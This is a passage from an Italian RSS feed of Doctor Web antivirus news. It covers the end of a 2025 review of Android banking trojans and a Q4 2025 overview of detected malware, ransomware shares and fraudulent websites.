&lt;p&gt;Per il "prelievo" del denaro, il programma chiedeva una serie di dati, tuttavia, gli utenti non ricevevano alcun pagamento.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; chiede di indicare il nome completo dell'utente e informazioni sull'account bancario&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Trojan bancari&lt;/h3&gt;

&lt;p&gt;Secondo i dati delle statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel 2025 la quota dei trojan bancari del numero totale di programmi malevoli registrati è stata il 6,94%, il che è leggermente superiore al valore del 6,29% dell'anno precedente. Durante i primi tre mesi, l'attività dei trojan bancari rimaneva approssimativamente allo stesso livello, ma già all'inizio del II trimestre essa è notevolmente aumentata. Successivamente ha iniziato a diminuire gradualmente raggiungendo il minimo annuale a luglio. Da agosto il numero di rilevamenti ha ricominciato a crescere e già ad ottobre ha raggiunto il picco. Alla fine dell'anno si osservava un altro calo.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/26_banker_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/26_banker_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Nel 2025 i malintenzionati continuavano a utilizzare una serie di popolari famiglie di trojan bancari nei loro attacchi. Tra i più attivi erano i programmi malevoli &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot.Coper&amp;lng=en" target="_blank"&gt;Coper&lt;/a&gt;, &lt;b&gt;Android.BankBot.Ermac&lt;/b&gt; e alcuni altri. Inoltre, sono state rilevate nuove versioni dei trojan &lt;a href="https://vms.drweb.ru/virus/?i=29204494" target="_blank"&gt;NGate&lt;/a&gt;, che utilizzano la tecnologia NFC per il furto di denaro. Questi programmi malevoli trasmettono ai malintenzionati dati dal chip NFC dei dispositivi infetti, consentendo ai truffatori, senza ulteriore coinvolgimento degli utenti, di prelevare denaro dai conti delle vittime ai bancomat o fare acquisti utilizzando il pagamento contactless. Tra le varianti più attive erano &lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.17&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.5.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;È continuata la diffusione di &lt;b&gt;Android.SpyMax&lt;/b&gt; — applicazioni malevole con funzionalità spia, basate sul codice sorgente reso pubblico del trojan RAT SpyNote. I cybercriminali le utilizzano, tra l'altro, anche come trojan bancari. Rispetto al 2024, però, l'attività di &lt;b&gt;Android.SpyMax&lt;/b&gt; è diminuita. Queste applicazioni malevole hanno rappresentato il 12,35% dei rilevamenti di trojan bancari contro l'indicatore del 32,04% dell'anno prima.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Nel 2025 gli utenti russi il più spesso affrontavano i vari trojan bancari che secondo la classificazione dell'azienda Doctor Web rientrano nell'ampia famiglia Mamont (&lt;b&gt;Android.Banker.790.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.3.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.28.origin&lt;/b&gt;). Include svariate applicazioni malevole che gli autori di virus continuano attivamente a modificare e sviluppare. Questi programmi intercettano gli SMS con codici monouso da istituzioni finanziarie e rubano i dati di carte bancarie e altre informazioni confidenziali.&lt;/p&gt;

&lt;p&gt;Durante l'anno, i nostri specialisti registravano un'attività di trojan bancari mirati agli abitanti di Uzbekistan e degli stati confinanti con esso, inclusa Armenia, Azerbaigian e Kirghizistan. Il più spesso sui dispositivi protetti venivano rilevati &lt;b&gt;Android.Banker.951.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.881.origin&lt;/b&gt; e &lt;b&gt;Android.Banker.963.origin&lt;/b&gt;, che rubano i codici SMS di verifica da istituzioni creditizie. I cybercriminali modificano di continuo tali applicazioni malevole per renderne più difficile il rilevamento. Gli utenti turchi il più spesso sono stati attaccati dai trojan bancari &lt;b&gt;Android.BankBot.Coper.12.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5685&lt;/b&gt; e &lt;b&gt;Android.Banker.864.origin&lt;/b&gt;, che anche sono in grado di sottrarre il contenuto di messaggi SMS.&lt;/p&gt;

&lt;p&gt;Nello stesso tempo, gli abitanti di Iran dovevano affrontare i trojan &lt;b&gt;Android.BankBot.1190.origin&lt;/b&gt;, &lt;b&gt;Android.BankBot.1191.origin&lt;/b&gt; e loro varianti. Questi programmi malevoli rubano informazioni bancarie dai messaggi SMS: trovano in essi dati sulle carte bancarie, sui conti della vittima, sulla somma di denaro disponibile, sulle operazioni effettuate ecc., dopodiché inviano tali informazioni ai malintenzionati. Inoltre, raccolgono informazioni sui contatti dalla rubrica e sono in grado di inviare messaggi SMS su comando degli attaccanti.&lt;/p&gt;

&lt;p&gt;Gli abitanti di molti paesi di Asia Sudorientale e Asia Pacifico, inclusa Indonesia e Corea del Sud, venivano attaccati dal trojan &lt;b&gt;Android.BankBot.Remo.1.origin&lt;/b&gt;. Questo malware utilizza le funzioni di accessibilità per rubare dati dalle applicazioni di banche e portafogli crypto installate sui dispositivi infetti. Oltre al trojan Remo, gli utenti sudcoreani riscontavano anche i trojan &lt;b&gt;Android.BankBot.15140&lt;/b&gt;, &lt;b&gt;Android.BankBot.Ermac.6.origin&lt;/b&gt; e GoldDigger (&lt;b&gt;Android.BankBot.GoldDigger.9&lt;/b&gt;, &lt;b&gt;Android.BankBot.GoldDigger.11&lt;/b&gt;).&lt;/p&gt;

&lt;p&gt;I programmi malevoli GoldDigger venivano adoperati anche contro gli utenti indonesiani e thailandesi. E il trojan bancario &lt;b&gt;Android.BankBot.Gigabud.1.origin&lt;/b&gt; veniva utilizzato contro i clienti di istituzioni creditizie di Indonesia e Malesia. Nello stesso tempo, i malintenzionati hanno continuato ad impiegare i trojan MoqHao negli attacchi al pubblico giapponese. Si sono diffuse le varianti di MoqHao come &lt;b&gt;Android.Banker.672.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5063&lt;/b&gt;, &lt;b&gt;Android.Banker.740.origin&lt;/b&gt; e una serie di altre.&lt;/p&gt;

&lt;p&gt;Uno dei trojan bancari mirati agli abitanti di India è stato &lt;b&gt;Android.Banker.6209&lt;/b&gt;. Il trojan imita l'aspetto esteriore di vere applicazioni bancarie al fine di rubare dati degli utenti: i loro nomi, numeri di carte bancarie e codici di sicurezza CVV. Oltre a questo, utilizza i dispositivi infetti per il mining nascosto della criptovaluta Monero. Di nuovo erano diffusi anche i trojan bancari RewardSteal, come &lt;b&gt;Android.Banker.814.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.913.origin&lt;/b&gt; e &lt;b&gt;Android.Banker.5132&lt;/b&gt;. Per il furto di dati bancari, essi si mascherano da software presumibilmente legati a istituzioni creditizie indiane: ad esempio, ICICI, SBI, Axis e PM Kisan.&lt;/p&gt;

&lt;p&gt;I proprietari di dispostivi Android brasiliani il più spesso venivano attaccati dai malware &lt;b&gt;Android.BankBot.1183.origin&lt;/b&gt;, nonché da una serie di esemplari della famiglia NGate —&lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.9&lt;/b&gt; и &lt;b&gt;Android.Banker.NGate.14&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Nel 2025 gli autori di virus hanno continuato a utilizzare le varie tecniche di protezione dei trojan Android bancari dall'analisi e dal rilevamento. Ad esempio, si sono diffusi gli svariati metodi di offuscamento e occultamento di codice, quale DEX to C (conversione di codice DEX eseguibile in codice di linguaggio C), nonché l'offuscamento di applicazioni malevole tramite lo strumento NP Manager.&lt;/p&gt;

&lt;p&gt;Sono rimaste popolari le tecniche di manipolazione con il formato degli archivi ZIP, i quali in effetti sono i file APK di applicazioni Android. Tra queste sono la manipolazione con i campi &lt;span class="string"&gt;compression method&lt;/span&gt; e &lt;span class="string"&gt;compressed size&lt;/span&gt; nella struttura dell'intestazione del file locale all'interno dell'APK, nonché l'uso di dati su disco non corretti nel record ECDR e CD. Ne abbiamo parlato in maggior dettaglio in una &lt;a href="https://news.drweb-av.it/show/review/?i=14970#troj" target="_blank"&gt;panoramica recente&lt;/a&gt; nella sezione sui trojan bancari. A seguito di tali manipolazioni, i programmi trojan rimangono completamente operativi, ma molti strumenti di analisi statica li percepiscono come danneggiati e non sono in grado di elaborarli correttamente.&lt;/p&gt;

&lt;p&gt;Gli attori di minacce hanno cominciato ad adoperare più attivamente i programmi dropper per nascondere il payload principale, ad esempio, per aggirare la protezione interna dello store Google Play. I cybercriminali utilizzano anche gli assistenti di intelligenza artificiale durante la scrittura del codice di trojan bancari, il che ne semplifica lo sviluppo e porta alla comparsa di nuove famiglie. Oltre a questo, i malintenzionati impiegano più spesso i bot Telegram per la gestione di trojan bancari e l'esfiltrazione di dati da dispositivi infetti.&lt;/p&gt;

&lt;h3&gt;Prospettive e tendenze&lt;/h3&gt;

&lt;p&gt;Nel 2025 abbiamo osservato un'alta attività dei trojan pubblicitari, che rimangono le minacce per SO Android più diffuse. Di nuovo erano largamente diffusi anche i vari programmi falsificazione utilizzati per scopi fraudolenti, tra l'altro, per il phishing e il furto di denaro. Oltre a ciò, è continuata la crescita del numero di attacchi con l'utilizzo dei trojan bancari. Tutte queste applicazioni malevole sono una fonte di reddito illegale per i cybercriminali, pertanto, la loro popolarità rimarrà a un livello elevato. L'anno prossimo molto probabilmente esse di nuovo saranno uno dei popolari strumenti di guadagno dei malintenzionati. Allo stesso tempo, i malintenzionati impiegano sempre più spesso i bot Telegram per la gestione di trojan bancari. Questa tendenza molto probabilmente continuerà.&lt;/p&gt;

&lt;p&gt;La comparsa del programma malevolo &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, nonché delle nuove versioni dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; nei firmware di smartphone e TV box indica un continuo interesse dei malintenzionati a distribuire malware nei modi che ne rendono molto più difficile il rilevamento. È molto probabile che nel nuovo anno la tendenza si manterrà, e vedremo nuovi casi di preinstallazione di applicazioni malevole su smartphone, TV box e altri tipi di dispostivi Android.&lt;/p&gt;

&lt;p&gt;Ci si può aspettare anche la comparsa di programmi malevoli più complessi, capaci di eseguire un ampio spettro di compiti. Tra di essi possono essere ulteriori backdoor e vari trojan spia. Oltre a ciò, gli attori di minacce molto probabilmente di nuovo utilizzeranno gli store di programmi ufficiali, incluso Google Play, per la collocazione in essi di software malevoli e indesiderati.&lt;/p&gt;

&lt;p&gt;I malintenzionati anche continueranno a incorporare i vari metodi di protezione per gli strumenti da loro creati. Inoltre, utilizzeranno più spesso gli assistenti basati sull'IA durante la scrittura di codice, e in conseguenza di ciò, ci si può aspettare la comparsa di un numero maggiore di nuove famiglie.&lt;/p&gt;

&lt;p&gt;L'azienda Doctor Web monitora il panorama delle minacce nel segmento mobile e risponde prontamente alle sfide che emergono. Agli utenti di Android consigliamo di installare Dr.Web Security Space per dispositivi mobili per proteggersi dai programmi malevoli e da altri programmi pericolosi.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/2025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15099&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in IV trimestre 2025</title><link>https://news.drweb-av.it/show/?i=15099&amp;lng=it&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;12 gennaio 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web, nel IV trimestre 2025 il numero totale di minacce rilevate è aumentato del 16,05% rispetto al III trimestre. Allo stesso tempo, il numero di minacce uniche è diminuito dell'1,13%. I più diffusi sono stati le applicazioni pubblicitarie indesiderate, gli script malevoli e i programmi malevoli diversi, inclusi i downloader e i trojan pubblicitari.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Nel traffico email venivano rilevate il più frequentemente le applicazioni trojan, tra cui erano i downloader, i password stealer e i dropper. Inoltre, tramite email venivano distribuiti gli exploit, i backdoor e gli svariati script malevoli.&lt;/p&gt;

&lt;p&gt;Gli utenti i cui file sono stati colpiti dai trojan ransomware di criptazione il più spesso riscontravano &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.29750&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Ad ottobre &lt;a href="https://news.drweb-av.it/show/?i=15076&amp;lng=it" target="_blank"&gt;abbiamo parlato&lt;/a&gt; di un backdoor per dispositivi Android, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, che i cybercriminali distribuiscono come parte di versioni modificate del programma di messaggistica Telegram X. Questo programma malevolo ruba i login e le password degli account Telegram e anche altri dati confidenziali. Per il suo tramite, gli attori di minacce possono gestire gli account hackerati delle vittime e controllare completamente il programma di messaggistica stesso, effettuando varie azioni a nome degli utenti.&lt;/p&gt;

&lt;p&gt;A novembre il nostro laboratorio antivirus ha pubblicato uno &lt;a href="https://news.drweb.com/show/?i=15078&amp;lng=en" target="_blank"&gt;studio&lt;/a&gt; di un attacco mirato effettuato da un gruppo di hacker, Cavalry Werewolf, a un ente pubblico russo. Durante l'esame effettuato, gli specialisti Doctor Web hanno individuato numerosi strumenti malevoli dei malintenzionati, tra cui strumenti open source, che i cybercriminali utilizzano nelle loro campagne. Sono state esaminate anche le caratteristiche del gruppo di hacker e le sue azioni tipiche all'interno di reti compromesse.&lt;/p&gt;

&lt;p&gt;A dicembre sul nostro sito web è stato pubblicato un &lt;a href="https://news.drweb-av.it/show/?i=15090&amp;lng=it" target="_blank"&gt;materiale&lt;/a&gt; su un trojan unico, chiamato &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.ChimeraWire&amp;lng=it"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, che "gonfia" la popolarità di siti, e per questo scopo si finge umano dimodoché le sue attività non vengano bloccate dalla protezione antibot delle piattaforme internet. Il programma malevolo cerca in autonomo i siti necessari nei motori di ricerca, li apre ed esegue clic sulle pagine web in base ai parametri ricevuti dai malintenzionati. &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.ChimeraWire&amp;lng=it"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; entra nei computer come risultato del funzionamento di più applicazioni malevole che sfruttano le vulnerabilità di classe DLL Search Order Hijacking, nonché utilizzano le tecniche antidebug per evitare il rilevamento.&lt;/p&gt;

&lt;p&gt;Durante il IV trimestre, gli analisti internet di Doctor Web hanno rilevato nuovi siti fraudolenti che promettevano alle potenziali vittime un guadagno veloce e facile. Sono stati individuati anche ulteriori risorse internet di phishing e falsi siti di marketplace.&lt;/p&gt;

&lt;p&gt;I nostri specialisti hanno rilevato ulteriori programmi malevoli sullo store di app Google Play. Tra questi erano i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che abbonano i proprietari di dispostivi Android a servizi a pagamento, nonché le applicazioni malevole &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che i malintenzionati utilizzano in vari schemi fraudolenti. Le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili nello stesso tempo hanno mostrato un aumento dell'attività dei trojan bancari per piattaforma Android.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di IV trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Aumento del numero di minacce rilevate sui dispositivi protetti&lt;/li&gt;
        &lt;li&gt;Diminuito il numero di minacce uniche impiegate durante attacchi&lt;/li&gt;
        &lt;li&gt;Cresciuto il numero di richieste di decriptazione di file colpiti da programmi trojan ransomware di criptazione&lt;/li&gt;
        &lt;li&gt;Attività aumentata dei trojan bancari mirati ai proprietari di dispostivi Android&lt;/li&gt;
        &lt;li&gt;Diffusione del backdoor Android.Backdoor.Baohuo.1.origin che hackera gli account Telegram di utenti Android&lt;/li&gt;
        &lt;li&gt;Comparse nuove applicazioni malevole sullo store di app Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse di IV trimestre 2025:&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan scritto nel linguaggio di programmazione Go e studiato per caricare nel sistema di destinazione vari cryptominer e software pubblicitari. Il programma malevolo è un file DLL e si trova in &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Per avviarsi, sfrutta la vulnerabilità di classe DLL Search Order Hijacking nel client torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Software pubblicitario utilizzato come installer intermedio di programmi pirata.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo che in ciclo infinito cerca finestre con il testo &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; e &lt;span class="string"&gt;розробника&lt;/span&gt; e invia ad esse un evento di clic sul pulsante Escape, chiudendole forzatamente.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4268&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un componente malevolo di un'estensione browser WinSafe. Questo componente rappresenta uno script JavaScript che visualizza pubblicità invadenti nei browser.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Siggen.33379&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Falsa estensione di blocco di pubblicità per browser Adblock Plus, che viene installata nel sistema da altre applicazioni malevole allo scopo di visualizzazione di annunci pubblicitari.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Statistiche delle applicazioni malevole nel traffico email&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse nel traffico email di IV trimestre 2025:&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Exploit per l'utilizzo di vulnerabilità nel software Microsoft Office, che consentono di eseguire codice arbitrario.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di una versione impacchettata del programma trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; scritto nel linguaggio di script AutoIt. Viene distribuita come parte di un gruppo di diverse applicazioni malevole: un cryptominer, un backdoor e un modulo per la distribuzione autonoma. &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; esegue varie azioni malevole che ostacolano il rilevamento del payload principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.791&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo nel linguaggio JavaScript che genera una pagina web di phishing.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Ransomware di criptazione&lt;/h3&gt;

&lt;p&gt;Nel IV trimestre 2025, il numero di richieste per la decriptazione di file colpiti da trojan ransomware di criptazione è aumentato dell'1,15% rispetto al III trimestre.&lt;/p&gt;

&lt;p&gt;Dinamica del numero di richieste di decriptazione pervenute al Servizio di supporto tecnico Doctor Web:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Ransomware di criptazione più diffusi di IV trimestre 2025: &lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 24.90% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 4.21% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.29750&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3.42% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.26996&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 2.68% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.30356 &lt;/b&gt; — 0.38% di richieste utente&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Frode online&lt;/h3&gt;

&lt;p&gt;Durante il IV trimestre 2025, gli analisti internet di Doctor Web hanno registrato la comparsa di nuovi falsi siti di marketplace. I truffatori, presumibilmente a nome delle piattaforme di commercio, invitano le potenziali vittime a partecipare a un gioco di tipo "carosello" (analogo della roulette) con una chance di vincere un premio. Dopo diversi tentativi, l'utente "ha un colpo di fortuna", ma per ricevere la vincita, gli viene chiesto prima di pagare la presunta consegna, quindi un'assicurazione, un'imposta ecc. In alcuni casi, alla vittima viene comunicato che l'articolo desiderato non è disponibile e viene proposto di scambiarlo con denaro. Per ottenere il denaro, però, è necessario pagare una "tassa". Se l'utente acconsente, gli viene chiesto di effettuare ulteriori pagamenti aggiuntivi sotto forma di assicurazione, attivazione di un certo conto ecc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di falso sito di marketplace che offre "un'estrazione a premi"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Al database dei siti non raccomandati e malevoli sono state aggiunte inoltre ulteriori risorse internet su cui i truffatori vendono biglietti teatrali inesistenti. Su tali siti viene proposto di visitare spettacoli popolari, tra l'altro, anche a prezzi attraenti. Tuttavia, dopo aver effettuato un pagamento, le vittime non ricevono i biglietti desiderati e in effetti regalano i soldi ai truffatori.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei siti truffaldini di vendita di biglietti teatrali inesistenti&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Inoltre, sono state individuate ulteriori risorse che imitano siti di cinema privati e invitano ad acquistare biglietti per vedere film. Dopo l'acquisto su tali siti, le vittime non ricevono alcun biglietto.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso sito di cinema privato&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I nostri specialisti hanno rilevato una serie di risorse di phishing, tra cui erano siti falsificati del servizio web Steam. Per il loro tramite, i malintenzionati cercavano di carpire i dati degli account degli utenti suggerendo loro di indicare i login e la password per l'autentificazione.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito di phishing che imita il vero portale internet Steam e suggerisce alla potenziale vittima di accedere al proprio account&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Oltre a ciò, i truffatori di nuovo attiravano le potenziali vittime in progetti di investimento inesistenti. Uno dei siti rilevati suggeriva agli utenti di lingua russa in America di investire 250$ in un progetto con il nome &lt;em&gt;Federal Invest&lt;/em&gt; e "guadagnare fino a 90.000 dollari per tre mesi". Questo progetto presumibilmente sarebbe stato creato, tra l'altro, anche con la partecipazione di Donald Trump.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito fraudolento che invita a partecipare a un "progetto di investimento redditizio"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Un altro sito informava che gli utenti uzbechi hanno la possibilità di ottenere da 15.000.000 di som uzbeki già nel primo mese dopo l'adesione al progetto pubblicizzato, presumibilmente legato a una grande holding.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito truffa promette agli abitanti di Uzbekistan un cospicuo profitto dalla partecipazione a un "progetto di investimento"&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="http://antifraud.drweb-av.it/dangerous_urls/"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;
